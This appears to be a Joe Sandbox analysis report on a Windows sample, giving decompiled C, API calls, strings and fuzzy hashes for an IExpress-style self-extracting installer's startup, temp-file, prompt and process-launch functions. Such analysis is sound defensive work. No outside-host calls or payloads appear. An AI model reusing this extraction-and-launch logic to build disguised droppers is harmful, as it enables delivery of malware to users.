                                                          0x010925d6
                                                          0x010925da
                                                          0x010925dd
                                                          0x010925dd
                                                          0x010925e3
                                                          0x010925e3
                                                          0x010925e3
                                                          0x0109258b
                                                          0x01092589
                                                          0x0109262f
                                                          0x00000000

                                                          APIs
                                                          • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000036,01094096,01094096,?,01091ED3,00000001,00000000,?,?,01094137,?), ref: 010925B2
                                                          • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,01094096,?,01091ED3,00000001,00000000,?,?,01094137,?,01094096), ref: 010925CB
                                                          • RegCloseKey.KERNELBASE(?,?,01091ED3,00000001,00000000,?,?,01094137,?,01094096), ref: 010925DD
                                                          • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000036,01094096,01094096,?,01091ED3,00000001,00000000,?,?,01094137,?), ref: 010925FF
                                                          • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,01094096,00000000,00000000,00000000,00000000,?,01091ED3,00000001,00000000), ref: 0109261A
                                                          Strings
                                                          • PendingFileRenameOperations, xrefs: 010925C3
                                                          • System\CurrentControlSet\Control\Session Manager, xrefs: 010925A8
                                                          • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 010925F5
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: OpenQuery$CloseInfoValue
                                                          • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                          • API String ID: 2209512893-559176071
                                                          • Opcode ID: d76eaa332dd4bb339c4711930ae3827c1ef54a2664e082bdc65468182ba934bb
                                                          • Instruction ID: 15d25a57591b98078d2dffaac648bc008fbff4f24e927dc571e92e77daf045bb
                                                          • Opcode Fuzzy Hash: d76eaa332dd4bb339c4711930ae3827c1ef54a2664e082bdc65468182ba934bb
                                                          • Instruction Fuzzy Hash: FD118635902228FB9F309B969C29DFF7EBCEF457A1F104095B989E2100D6314A44E6E0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 533 1096a60-1096a91 call 1097155 call 1097208 GetStartupInfoW 539 1096a93-1096aa2 533->539 540 1096abc-1096abe 539->540 541 1096aa4-1096aa6 539->541 544 1096abf-1096ac5 540->544 542 1096aa8-1096aad 541->542 543 1096aaf-1096aba Sleep 541->543 542->544 543->539 545 1096ad1-1096ad7 544->545 546 1096ac7-1096acf _amsg_exit 544->546 548 1096ad9-1096ae9 call 1096c3f 545->548 549 1096b05 545->549 547 1096b0b-1096b11 546->547 550 1096b2e-1096b30 547->550 551 1096b13-1096b24 _initterm 547->551 555 1096aee-1096af2 548->555 549->547 553 1096b3b-1096b42 550->553 554 1096b32-1096b39 550->554 551->550 556 1096b44-1096b51 call 1097060 553->556 557 1096b67-1096b71 553->557 554->553 555->547 558 1096af4-1096b00 555->558 556->557 566 1096b53-1096b65 556->566 560 1096b74-1096b79 557->560 561 1096c39-1096c3e call 109724d 558->561 563 1096b7b-1096b7d 560->563 564 1096bc5-1096bc8 560->564 569 1096b7f-1096b81 563->569 570 1096b94-1096b98 563->570 567 1096bca-1096bd3 564->567 568 1096bd6-1096be3 _ismbblead 564->568 566->557 567->568 574 1096be9-1096bed 568->574 575 1096be5-1096be6 568->575 569->564 576 1096b83-1096b85 569->576 572 1096b9a-1096b9e 570->572 573 1096ba0-1096ba2 570->573 578 1096ba3-1096bbc call 1092bfb 572->578 573->578 574->560 580 1096c1e-1096c25 574->580 575->574 576->570 577 1096b87-1096b8a 576->577 577->570 581 1096b8c-1096b92 577->581 578->580 586 1096bbe-1096bbf exit 578->586 583 1096c32 580->583 584 1096c27-1096c2d _cexit 580->584 581->576 583->561 584->583 586->564
                                                          C-Code - Quality: 51%
                                                          			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                          				signed int* _t25;
                                                          				signed int _t26;
                                                          				signed int _t29;
                                                          				int _t30;
                                                          				signed int _t37;
                                                          				signed char _t41;
                                                          				signed int _t53;
                                                          				signed int _t54;
                                                          				intOrPtr _t56;
                                                          				signed int _t58;
                                                          				signed int _t59;
                                                          				intOrPtr* _t60;
                                                          				void* _t62;
                                                          				void* _t67;
                                                          				void* _t68;
                                                          
                                                          				E01097155();
                                                          				_push(0x58);
                                                          				_push(0x10972b8);
                                                          				E01097208(__ebx, __edi, __esi);
                                                          				 *(_t62 - 0x20) = 0;
                                                          				GetStartupInfoW(_t62 - 0x68);
                                                          				 *((intOrPtr*)(_t62 - 4)) = 0;
                                                          				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
                                                          				_t53 = 0;
                                                          				while(1) {
                                                          					asm("lock cmpxchg [edx], ecx");
                                                          					if(0 == 0) {
                                                          						break;
                                                          					}
                                                          					if(0 != _t56) {
                                                          						Sleep(0x3e8);
                                                          						continue;
                                                          					} else {
                                                          						_t58 = 1;
                                                          						_t53 = 1;
                                                          					}
                                                          					L7:
                                                          					_t67 =  *0x10988b0 - _t58; // 0x2
                                                          					if(_t67 != 0) {
                                                          						__eflags =  *0x10988b0; // 0x2
                                                          						if(__eflags != 0) {
                                                          							 *0x10981e4 = _t58;
                                                          							goto L13;
                                                          						} else {
                                                          							 *0x10988b0 = _t58;
                                                          							_t37 = E01096C3F(0x10910b8, 0x10910c4); // executed
                                                          							__eflags = _t37;
                                                          							if(__eflags == 0) {
                                                          								goto L13;
                                                          							} else {
                                                          								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                          								_t30 = 0xff;
                                                          							}
                                                          						}
                                                          					} else {
                                                          						_push(0x1f);
                                                          						L01096FF4();
                                                          						L13:
                                                          						_t68 =  *0x10988b0 - _t58; // 0x2
                                                          						if(_t68 == 0) {
                                                          							_push(0x10910b4);
                                                          							_push(0x10910ac);
                                                          							L01097202();
                                                          							 *0x10988b0 = 2;
                                                          						}
                                                          						if(_t53 == 0) {
                                                          							 *0x10988ac = 0;
                                                          						}
                                                          						_t71 =  *0x10988b4;
                                                          						if( *0x10988b4 != 0 && E01097060(_t71, 0x10988b4) != 0) {
                                                          							_t60 =  *0x10988b4; // 0x0
                                                          							 *0x109a288(0, 2, 0);
                                                          							 *_t60();
                                                          						}
                                                          						_t25 = __imp___acmdln; // 0x76665b9c
                                                          						_t59 =  *_t25;
                                                          						 *(_t62 - 0x1c) = _t59;
                                                          						_t54 =  *(_t62 - 0x20);
                                                          						while(1) {
                                                          							_t41 =  *_t59;
                                                          							if(_t41 > 0x20) {
                                                          								goto L32;
                                                          							}
                                                          							if(_t41 != 0) {
                                                          								if(_t54 != 0) {
                                                          									goto L32;
                                                          								} else {
                                                          									while(_t41 != 0 && _t41 <= 0x20) {
                                                          										_t59 = _t59 + 1;
                                                          										 *(_t62 - 0x1c) = _t59;
                                                          										_t41 =  *_t59;
                                                          									}
                                                          								}
                                                          							}
                                                          							__eflags =  *(_t62 - 0x3c) & 0x00000001;
                                                          							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
                                                          								_t29 = 0xa;
                                                          							} else {
                                                          								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
                                                          							}
                                                          							_push(_t29);
                                                          							_t30 = E01092BFB(0x1090000, 0, _t59); // executed
                                                          							 *0x10981e0 = _t30;
                                                          							__eflags =  *0x10981f8;
                                                          							if( *0x10981f8 == 0) {
                                                          								exit(_t30); // executed
                                                          								goto L32;
                                                          							}
                                                          							__eflags =  *0x10981e4;
                                                          							if( *0x10981e4 == 0) {
                                                          								__imp___cexit();
                                                          								_t30 =  *0x10981e0; // 0x0
                                                          							}
                                                          							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                          							goto L40;
                                                          							L32:
                                                          							__eflags = _t41 - 0x22;
                                                          							if(_t41 == 0x22) {
                                                          								__eflags = _t54;
                                                          								_t15 = _t54 == 0;
                                                          								__eflags = _t15;
                                                          								_t54 = 0 | _t15;
                                                          								 *(_t62 - 0x20) = _t54;
                                                          							}
                                                          							_t26 = _t41 & 0x000000ff;
                                                          							__imp___ismbblead(_t26);
                                                          							__eflags = _t26;
                                                          							if(_t26 != 0) {
                                                          								_t59 = _t59 + 1;
                                                          								__eflags = _t59;
                                                          								 *(_t62 - 0x1c) = _t59;
                                                          							}
                                                          							_t59 = _t59 + 1;
                                                          							 *(_t62 - 0x1c) = _t59;
                                                          						}
                                                          					}
                                                          					L40:
                                                          					return E0109724D(_t30);
                                                          				}
                                                          				_t58 = 1;
                                                          				__eflags = 1;
                                                          				goto L7;
                                                          			}


















                                                          0x01096a60
                                                          0x01096a6a
                                                          0x01096a6c
                                                          0x01096a71
                                                          0x01096a78
                                                          0x01096a7f
                                                          0x01096a85
                                                          0x01096a8e
                                                          0x01096a91
                                                          0x01096a93
                                                          0x01096a9c
                                                          0x01096aa2
                                                          0x00000000
                                                          0x00000000
                                                          0x01096aa6
                                                          0x01096ab4
                                                          0x00000000
                                                          0x01096aa8
                                                          0x01096aaa
                                                          0x01096aab
                                                          0x01096aab
                                                          0x01096abf
                                                          0x01096abf
                                                          0x01096ac5
                                                          0x01096ad1
                                                          0x01096ad7
                                                          0x01096b05
                                                          0x00000000
                                                          0x01096ad9
                                                          0x01096ad9
                                                          0x01096ae9
                                                          0x01096af0
                                                          0x01096af2
                                                          0x00000000
                                                          0x01096af4
                                                          0x01096af4
                                                          0x01096afb
                                                          0x01096afb
                                                          0x01096af2
                                                          0x01096ac7
                                                          0x01096ac7
                                                          0x01096ac9
                                                          0x01096b0b
                                                          0x01096b0b
                                                          0x01096b11
                                                          0x01096b13
                                                          0x01096b18
                                                          0x01096b1d
                                                          0x01096b24
                                                          0x01096b24
                                                          0x01096b30
                                                          0x01096b39
                                                          0x01096b39
                                                          0x01096b3b
                                                          0x01096b42
                                                          0x01096b57
                                                          0x01096b5f
                                                          0x01096b65
                                                          0x01096b65
                                                          0x01096b67
                                                          0x01096b6c
                                                          0x01096b6e
                                                          0x01096b71
                                                          0x01096b74
                                                          0x01096b74
                                                          0x01096b79
                                                          0x00000000
                                                          0x00000000
                                                          0x01096b7d
                                                          0x01096b81
                                                          0x00000000
                                                          0x00000000
                                                          0x01096b83
                                                          0x01096b8c
                                                          0x01096b8d
                                                          0x01096b90
                                                          0x01096b90
                                                          0x01096b83
                                                          0x01096b81
                                                          0x01096b94
                                                          0x01096b98
                                                          0x01096ba2
                                                          0x01096b9a
                                                          0x01096b9a
                                                          0x01096b9a
                                                          0x01096ba3
                                                          0x01096bab
                                                          0x01096bb0
                                                          0x01096bb5
                                                          0x01096bbc
                                                          0x01096bbf
                                                          0x00000000
                                                          0x01096bbf
                                                          0x01096c1e
                                                          0x01096c25
                                                          0x01096c27
                                                          0x01096c2d
                                                          0x01096c2d
                                                          0x01096c32
                                                          0x00000000
                                                          0x01096bc5
                                                          0x01096bc5
                                                          0x01096bc8
                                                          0x01096bcc
                                                          0x01096bce
                                                          0x01096bce
                                                          0x01096bd1
                                                          0x01096bd3
                                                          0x01096bd3
                                                          0x01096bd6
                                                          0x01096bda
                                                          0x01096be1
                                                          0x01096be3
                                                          0x01096be5
                                                          0x01096be5
                                                          0x01096be6
                                                          0x01096be6
                                                          0x01096be9
                                                          0x01096bea
                                                          0x01096bea
                                                          0x01096b74
                                                          0x01096c39
                                                          0x01096c3e
                                                          0x01096c3e
                                                          0x01096abe
                                                          0x01096abe
                                                          0x00000000

                                                          APIs
                                                            • Part of subcall function 01097155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 01097182
                                                            • Part of subcall function 01097155: GetCurrentProcessId.KERNEL32 ref: 01097191
                                                            • Part of subcall function 01097155: GetCurrentThreadId.KERNEL32 ref: 0109719A
                                                            • Part of subcall function 01097155: GetTickCount.KERNEL32 ref: 010971A3
                                                            • Part of subcall function 01097155: QueryPerformanceCounter.KERNEL32(?), ref: 010971B8
                                                          • GetStartupInfoW.KERNEL32(?,010972B8,00000058), ref: 01096A7F
                                                          • Sleep.KERNEL32(000003E8), ref: 01096AB4
                                                          • _amsg_exit.MSVCRT ref: 01096AC9
                                                          • _initterm.MSVCRT ref: 01096B1D
                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 01096B49
                                                          • exit.KERNELBASE ref: 01096BBF
                                                          • _ismbblead.MSVCRT ref: 01096BDA
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                          • String ID:
                                                          • API String ID: 836923961-0
                                                          • Opcode ID: 3f959237a13625c10e51356f420cd098d729e8961de9430418f59b35915b8ff2
                                                          • Instruction ID: 9b89dc14aefb3488861c7ca12d1b21f225ac2d2bdfdae55941ee424a3452d795
                                                          • Opcode Fuzzy Hash: 3f959237a13625c10e51356f420cd098d729e8961de9430418f59b35915b8ff2
                                                          • Instruction Fuzzy Hash: 2F410371A04229CBDF619B6DD8347AE7BE4BB45720F10805BE9C1D7384DB7B4480AB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 587 10958c8-10958d5 588 10958d8-10958dd 587->588 588->588 589 10958df-10958f1 LocalAlloc 588->589 590 1095919-1095959 call 1091680 call 109658a CreateFileA LocalFree 589->590 591 10958f3-1095901 call 10944b9 589->591 595 1095906-1095910 call 1096285 590->595 600 109595b-109596c CloseHandle GetFileAttributesA 590->600 591->595 601 1095912-1095918 595->601 600->595 602 109596e-1095970 600->602 602->595 603 1095972-109597b 602->603 603->601
                                                          C-Code - Quality: 95%
                                                          			E010958C8(intOrPtr* __ecx) {
                                                          				void* _v8;
                                                          				intOrPtr _t6;
                                                          				void* _t10;
                                                          				void* _t12;
                                                          				void* _t14;
                                                          				signed char _t16;
                                                          				void* _t20;
                                                          				void* _t23;
                                                          				intOrPtr* _t27;
                                                          				CHAR* _t33;
                                                          
                                                          				_push(__ecx);
                                                          				_t33 = __ecx;
                                                          				_t27 = __ecx;
                                                          				_t23 = __ecx + 1;
                                                          				do {
                                                          					_t6 =  *_t27;
                                                          					_t27 = _t27 + 1;
                                                          				} while (_t6 != 0);
                                                          				_t36 = _t27 - _t23 + 0x14;
                                                          				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
                                                          				if(_t20 != 0) {
                                                          					E01091680(_t20, _t36, _t33);
                                                          					E0109658A(_t20, _t36, "TMP4351$.TMP");
                                                          					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
                                                          					_v8 = _t10;
                                                          					LocalFree(_t20);
                                                          					_t12 = _v8;
                                                          					if(_t12 == 0xffffffff) {
                                                          						goto L4;
                                                          					} else {
                                                          						CloseHandle(_t12);
                                                          						_t16 = GetFileAttributesA(_t33); // executed
                                                          						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
                                                          							goto L4;
                                                          						} else {
                                                          							 *0x1099124 = 0;
                                                          							_t14 = 1;
                                                          						}
                                                          					}
                                                          				} else {
                                                          					E010944B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                          					L4:
                                                          					 *0x1099124 = E01096285();
                                                          					_t14 = 0;
                                                          				}
                                                          				return _t14;
                                                          			}













                                                          0x010958cd
                                                          0x010958d1
                                                          0x010958d3
                                                          0x010958d5
                                                          0x010958d8
                                                          0x010958d8
                                                          0x010958da
                                                          0x010958db
                                                          0x010958e1
                                                          0x010958ed
                                                          0x010958f1
                                                          0x0109591e
                                                          0x0109592c
                                                          0x01095943
                                                          0x0109594a
                                                          0x0109594d
                                                          0x01095953
                                                          0x01095959
                                                          0x00000000
                                                          0x0109595b
                                                          0x0109595c
                                                          0x01095963
                                                          0x0109596c
                                                          0x00000000
                                                          0x01095972
                                                          0x01095974
                                                          0x0109597a
                                                          0x0109597a
                                                          0x0109596c
                                                          0x010958f3
                                                          0x01095901
                                                          0x01095906
                                                          0x0109590b
                                                          0x01095910
                                                          0x01095910
                                                          0x01095918

                                                          APIs
                                                          • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,01095534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 010958E7
                                                          • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,01095534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 01095943
                                                          • LocalFree.KERNEL32(00000000,?,01095534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0109594D
                                                          • CloseHandle.KERNEL32(00000000,?,01095534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0109595C
                                                          • GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,01095534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 01095963
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$TMP4351$.TMP
                                                          • API String ID: 747627703-1860564779
                                                          • Opcode ID: 4b76299d49bdcde422c31beaf363b594963bedc375d671e6e66acbace14d582c
                                                          • Instruction ID: 74be7bc4c0f09bef231b3ccff123f24a2388f8887712553d7c4837850b745649
                                                          • Opcode Fuzzy Hash: 4b76299d49bdcde422c31beaf363b594963bedc375d671e6e66acbace14d582c
                                                          • Instruction Fuzzy Hash: F611387170021167EF301E7E6C2CA9B7E9DEF86270B00465AF5C5D31C4CA75980693A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 631 1093fef-1094010 632 109410a-109411a call 1096ce0 631->632 633 1094016-109403b CreateProcessA 631->633 634 1094041-109406e WaitForSingleObject GetExitCodeProcess 633->634 635 10940c4-1094101 call 1096285 GetLastError FormatMessageA call 10944b9 633->635 637 1094091 call 109411b 634->637 638 1094070-1094077 634->638 647 1094106 635->647 645 1094096-10940b8 CloseHandle * 2 637->645 638->637 641 1094079-109407b 638->641 641->637 644 109407d-1094089 641->644 644->637 648 109408b 644->648 649 1094108 645->649 650 10940ba-10940c0 645->650 647->649 648->637 649->632 650->649 651 10940c2 650->651 651->647
                                                          C-Code - Quality: 84%
                                                          			E01093FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
                                                          				signed int _v8;
                                                          				char _v524;
                                                          				long _v528;
                                                          				struct _PROCESS_INFORMATION _v544;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t20;
                                                          				void* _t22;
                                                          				int _t25;
                                                          				intOrPtr* _t39;
                                                          				signed int _t44;
                                                          				void* _t49;
                                                          				signed int _t50;
                                                          				intOrPtr _t53;
                                                          
                                                          				_t45 = __edx;
                                                          				_t20 =  *0x1098004; // 0x8a9c601
                                                          				_v8 = _t20 ^ _t50;
                                                          				_t39 = __ecx;
                                                          				_t49 = 1;
                                                          				_t22 = 0;
                                                          				if(__ecx == 0) {
                                                          					L13:
                                                          					return E01096CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
                                                          				}
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
                                                          				if(_t25 == 0) {
                                                          					 *0x1099124 = E01096285();
                                                          					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0);
                                                          					_t45 = 0x4c4;
                                                          					E010944B9(0, 0x4c4, _t39,  &_v524, 0x10, 0);
                                                          					L11:
                                                          					_t49 = 0;
                                                          					L12:
                                                          					_t22 = _t49;
                                                          					goto L13;
                                                          				}
                                                          				WaitForSingleObject(_v544.hProcess, 0xffffffff);
                                                          				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
                                                          				_t44 = _v528;
                                                          				_t53 =  *0x1098a28; // 0x0
                                                          				if(_t53 == 0) {
                                                          					_t34 =  *0x1099a2c; // 0x0
                                                          					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
                                                          						_t34 = _t44 & 0xff000000;
                                                          						if((_t44 & 0xff000000) == 0xaa000000) {
                                                          							 *0x1099a2c = _t44;
                                                          						}
                                                          					}
                                                          				}
                                                          				E0109411B(_t34, _t44);
                                                          				CloseHandle(_v544.hThread);
                                                          				CloseHandle(_v544);
                                                          				if(( *0x1099a34 & 0x00000400) == 0 || _v528 >= 0) {
                                                          					goto L12;
                                                          				} else {
                                                          					goto L11;
                                                          				}
                                                          			}


















                                                          0x01093fef
                                                          0x01093ffa
                                                          0x01094001
                                                          0x01094008
                                                          0x0109400a
                                                          0x0109400b
                                                          0x01094010
                                                          0x0109410a
                                                          0x0109411a
                                                          0x0109411a
                                                          0x0109401c
                                                          0x0109401d
                                                          0x0109401e
                                                          0x0109401f
                                                          0x01094033
                                                          0x0109403b
                                                          0x010940ca
                                                          0x010940e9
                                                          0x010940f8
                                                          0x01094101
                                                          0x01094106
                                                          0x01094106
                                                          0x01094108
                                                          0x01094108
                                                          0x00000000
                                                          0x01094108
                                                          0x01094049
                                                          0x0109405c
                                                          0x01094062
                                                          0x01094068
                                                          0x0109406e
                                                          0x01094070
                                                          0x01094077
                                                          0x0109407f
                                                          0x01094089
                                                          0x0109408b
                                                          0x0109408b
                                                          0x01094089
                                                          0x01094077
                                                          0x01094091
                                                          0x0109409c
                                                          0x010940a8
                                                          0x010940b8
                                                          0x00000000
                                                          0x010940c2
                                                          0x00000000
                                                          0x010940c2

                                                          APIs
                                                          • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?,?,?,00000000), ref: 01094033
                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 01094049
                                                          • GetExitCodeProcess.KERNELBASE ref: 0109405C
                                                          • CloseHandle.KERNEL32(?), ref: 0109409C
                                                          • CloseHandle.KERNEL32(?), ref: 010940A8
                                                          • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 010940DC
                                                          • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 010940E9
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                          • String ID:
                                                          • API String ID: 3183975587-0
                                                          • Opcode ID: 4dd03a9d04f20908b1d17fa073730f42533f0fa93e10e9b4f634806217f7a968
                                                          • Instruction ID: 05a7396133d80d573a1e6741f1b6d13273a62868453e53bd51a22a9de6c993ca
                                                          • Opcode Fuzzy Hash: 4dd03a9d04f20908b1d17fa073730f42533f0fa93e10e9b4f634806217f7a968
                                                          • Instruction Fuzzy Hash: F431B171740208ABEF709B69DD68FAB77B8FBD4700F1001AAF585D2155CA3A4C82DB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 652 10951e5-109520b call 109468f LocalAlloc 655 109522d-109523c call 109468f 652->655 656 109520d-1095228 call 10944b9 call 1096285 652->656 662 109523e-1095260 call 10944b9 LocalFree 655->662 663 1095262-1095270 lstrcmpA 655->663 669 10952b0 656->669 662->669 666 109527e-109529c call 10944b9 LocalFree 663->666 667 1095272-1095273 LocalFree 663->667 674 109529e-10952a4 666->674 675 10952a6 666->675 671 1095279-109527c 667->671 673 10952b2-10952b5 669->673 671->673 674->671 675->669
                                                          C-Code - Quality: 100%
                                                          			E010951E5(void* __eflags) {
                                                          				int _t5;
                                                          				void* _t6;
                                                          				void* _t28;
                                                          
                                                          				_t1 = E0109468F("UPROMPT", 0, 0) + 1; // 0x1
                                                          				_t28 = LocalAlloc(0x40, _t1);
                                                          				if(_t28 != 0) {
                                                          					if(E0109468F("UPROMPT", _t28, _t29) != 0) {
                                                          						_t5 = lstrcmpA(_t28, "<None>"); // executed
                                                          						if(_t5 != 0) {
                                                          							_t6 = E010944B9(0, 0x3e9, _t28, 0, 0x20, 4);
                                                          							LocalFree(_t28);
                                                          							if(_t6 != 6) {
                                                          								 *0x1099124 = 0x800704c7;
                                                          								L10:
                                                          								return 0;
                                                          							}
                                                          							 *0x1099124 = 0;
                                                          							L6:
                                                          							return 1;
                                                          						}
                                                          						LocalFree(_t28);
                                                          						goto L6;
                                                          					}
                                                          					E010944B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                          					LocalFree(_t28);
                                                          					 *0x1099124 = 0x80070714;
                                                          					goto L10;
                                                          				}
                                                          				E010944B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                          				 *0x1099124 = E01096285();
                                                          				goto L10;
                                                          			}






                                                          0x010951fb
                                                          0x01095207
                                                          0x0109520b
                                                          0x0109523c
                                                          0x01095268
                                                          0x01095270
                                                          0x0109528b
                                                          0x01095293
                                                          0x0109529c
                                                          0x010952a6
                                                          0x010952b0
                                                          0x00000000
                                                          0x010952b0
                                                          0x0109529e
                                                          0x01095279
                                                          0x00000000
                                                          0x0109527b
                                                          0x01095273
                                                          0x00000000
                                                          0x01095273
                                                          0x0109524a
                                                          0x01095250
                                                          0x01095256
                                                          0x00000000
                                                          0x01095256
                                                          0x01095219
                                                          0x01095223
                                                          0x00000000

                                                          APIs
                                                            • Part of subcall function 0109468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010946A0
                                                            • Part of subcall function 0109468F: SizeofResource.KERNEL32(00000000,00000000,?,01092D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010946A9
                                                            • Part of subcall function 0109468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010946C3
                                                            • Part of subcall function 0109468F: LoadResource.KERNEL32(00000000,00000000,?,01092D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010946CC
                                                            • Part of subcall function 0109468F: LockResource.KERNEL32(00000000,?,01092D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010946D3
                                                            • Part of subcall function 0109468F: memcpy_s.MSVCRT ref: 010946E5
                                                            • Part of subcall function 0109468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010946EF
